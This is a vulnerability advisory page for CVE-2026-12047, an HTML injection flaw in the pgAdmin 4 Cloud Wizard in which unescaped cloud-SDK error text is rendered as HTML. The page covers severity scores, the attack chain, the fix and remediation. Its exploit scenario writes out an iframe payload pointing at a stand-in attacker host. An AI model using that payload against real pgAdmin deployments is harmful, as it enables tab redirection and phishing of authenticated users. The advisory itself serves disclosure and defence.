Skip to main content

pgAdmin 4 CVE-2026-12047

| EUVD-2026-37967 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-18 PostgreSQL GHSA-prff-6vwq-gf23
Microsoft Google XSS Pgadmin 4
4.8
CVSS 4.0 · Vendor: PostgreSQL
Share

Severity by source

Vendor (PostgreSQL) PRIMARY
4.8 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
3.5 LOW

Requires authenticated session (PR:L) and user must actively submit the crafted request (UI:R); impact is low integrity only, no confidentiality or availability consequence.

3.1 AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (PostgreSQL).

CVSS VectorVendor: PostgreSQL

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
A
Scope
X

Lifecycle Timeline

5
Source Code Evidence Fetched
Jun 19, 2026 - 00:34 vuln.today
Analysis Generated
Jun 19, 2026 - 00:34 vuln.today
Severity Changed
Jun 19, 2026 - 00:22 NVD
LOW MEDIUM
CVSS changed
Jun 19, 2026 - 00:22 NVD
3.5 (LOW) 4.8 (MEDIUM)
CVE Published
Jun 18, 2026 - 23:37 cve.org
MEDIUM 4.8

DescriptionCVE.org

HTML injection in pgAdmin 4's cloud deployment module. The verify_credentials, deploy, regions, and update-server endpoints under /rds/, /azure/, /google/, and the top-level /cloud/ blueprint propagated AWS / Azure / Google SDK exception text - and the related file-resolution and database-commit exception text - into the JSON response body (the info and errormsg fields) without HTML-encoding. The Cloud Wizard frontend rendered these strings through html-react-parser, so an attacker-influenced exception message embedded structural HTML directly into the wizard's DOM.

The reported entry point is /rds/verify_credentials/. An authenticated pgAdmin user submits a crafted access_key whose value contains an <iframe/src=...> payload; AWS STS rejects the credential with an IncompleteSignature exception whose text quotes the access_key verbatim; the pgAdmin backend forwards that text into the JSON info field; the Cloud Wizard's FormFooterMessage parses it as HTML. The browser fetches the iframe's src from an attacker-controlled host, and JavaScript executing inside the cross-origin iframe writes to parent.location, redirecting the victim's pgAdmin tab. Because the injection renders inside pgAdmin's own interface, X-Frame-Options and Content-Security-Policy frame-ancestors do not mitigate it. Baseline impact is self-targeted (the same user who supplied the payload sees the injection); escalation against other authenticated users requires an additional cross-site request-forgery primitive capable of submitting the malformed credential request with a valid X-pgA-CSRFToken in the victim's browser context.

The same unsanitised-error-into-JSON pattern was present across multiple sibling endpoints - Azure's check_cluster_name_availability, every Google endpoint that surfaces SDK errors (verification_ack, projects, regions, instance_types, database_versions, the verify_credentials path-resolution branches), the central /deploy endpoint that bubbles str(e) from deploy_on_rds / deploy_on_azure / deploy_on_google, and update_cloud_server which surfaces the str(e) from a failing db.session.commit - all of which are now covered.

Fix HTML-escapes every external/SDK exception string at the endpoint sink via a new shared sanitize_external_text helper (HTML escape with control-character strip), promoted out of the psycopg3 driver into web/pgadmin/utils/text_sanitize.py. The Cloud Wizard frontend additionally renders its FormFooterMessage in plain-text mode for backend-derived strings, so the value is never parsed as HTML even if a future sink forgets the escape.

This issue affects pgAdmin 4: from 6.6 before 9.16.

AnalysisAI

HTML injection in pgAdmin 4's Cloud Wizard (versions 6.6 through 9.15.x) allows authenticated users to embed arbitrary HTML into the tool's DOM by exploiting unescaped AWS, Azure, and Google Cloud SDK exception text propagated into JSON response fields and parsed by html-react-parser. The primary impact is self-targeted DOM manipulation - the authenticated user who submits the crafted payload is the one who sees it rendered - with escalation to cross-user exploitation requiring an additional CSRF primitive to forge a valid X-pgA-CSRFToken in a victim's browser. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to pgAdmin as low-privilege user
Delivery
Open Cloud Wizard and craft HTML payload in credential field
Exploit
Submit crafted credential to /rds/verify_credentials/ (or Azure/Google equivalent)
Install
Cloud provider SDK returns error quoting payload verbatim
C2
pgAdmin backend serializes unescaped error into JSON response
Execute
Cloud Wizard renders error via html-react-parser
Impact
Injected iframe or script executes in pgAdmin's origin, redirecting victim's tab
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated pgAdmin 4 session (confirmed by CVSS PR:L) and active submission of a credential-verification request through the Cloud Wizard UI (confirmed by CVSS UI:A). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 4.8 (Medium) with vector AV:N/AC:L/AT:N/PR:L/UI:A accurately reflects the constrained real-world risk: the attack is network-reachable and low-complexity but requires an authenticated session (PR:L) and active user interaction (UI:A). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated pgAdmin user opens the Cloud Wizard and submits a crafted AWS access key value such as '<iframe/src=https://attacker.example/>' to the /rds/verify_credentials/ endpoint. AWS STS returns an IncompleteSignature error quoting the access key verbatim; pgAdmin embeds the unescaped string into the JSON info field; and the Cloud Wizard's FormFooterMessage passes it through html-react-parser, instantiating the iframe in the DOM. …
Remediation Upgrade to pgAdmin 4 version 9.16 or later, which applies HTML-escaping at all affected endpoint sinks via the new sanitize_external_text helper and additionally hardens the Cloud Wizard frontend to render backend-derived strings in plain-text mode. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-12046 CRITICAL
9.5 Jun 18

Remote unauthenticated access to two SQL Editor endpoints in pgAdmin 4 server-mode deployments (versions 6.9 through 9.1
CVE-2026-12045 CRITICAL
9.4 Jun 18

Remote SQL injection via prompt injection in pgAdmin 4 versions 9.13 through 9.15 allows attackers who can write content
CVE-2026-12048 CRITICAL
9.3 Jun 18

Stored cross-site scripting in pgAdmin 4 versions 6.0 through 9.15 allows a malicious or attacker-influenced PostgreSQL

CVE-2026-12044 HIGH
8.7 Jun 18

SQL injection in pgAdmin 4 versions 1.0 through 9.15 allows an authenticated user with object-modification rights to inj
CVE-2026-12049 MEDIUM
5.3 Jun 18

Open redirect in pgAdmin 4's MFA validate and register endpoints allows network-accessible attackers to abuse the authen

Share

CVE-2026-12047 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy